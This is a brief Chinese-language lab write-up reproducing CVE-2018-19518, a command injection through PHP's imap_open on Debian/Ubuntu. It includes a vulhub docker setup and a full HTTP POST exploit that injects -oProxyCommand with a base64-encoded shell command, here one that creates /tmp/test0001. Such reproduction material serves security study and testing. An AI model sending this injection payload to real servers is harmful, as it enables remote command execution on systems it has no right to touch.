PHPimap远程命令执⾏漏洞(CVE-2018-19518)
1、简介
php imap扩展⽤于在PHP中执⾏邮件收发操作。其imap_open函数会调⽤rsh来连接远程shell,⽽debian/ubuntu中默认使⽤ssh来代替
rsh的功能(也就是说,在debian系列系统中,执⾏rsh命令实际执⾏的是ssh命令)。
因为ssh命令中可以通过设置-oProxyCommand=来调⽤第三⽅命令,攻击者通过注⼊注⼊这个参数,最终将导致命令执⾏漏洞。
cve漏洞库2、影响版本
PHP:5.6.38
系统:Debian/ubuntu
3、漏洞复现
使⽤vulhub和docker搭建
cd vulhub/php/CVE-2018-19518
docker-compose up -d
发送POST数据
POST / HTTP/1.1
Host: your-ip
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 125
hostname=x+-oProxyCommand%3decho%09ZWNobyAnMTIzNDU2Nzg5MCc%2bL3RtcC90ZXN0MDAwMQo%3d|base64%09-d|sh}&username=111&password=
这⾥提⽰是连接错误
在设计漏洞时需要先base64编码,再url编码。(注意不能失去⼤⼩写)
执⾏docker-compose exec web bash进⼊容器,/tmp/test0001已成功创建
版权声明:本站内容均来自互联网,仅供演示用,请勿用于商业和其他非法用途。如果侵犯了您的权益请与我们联系QQ:729038198,我们将在24小时内删除。
发表评论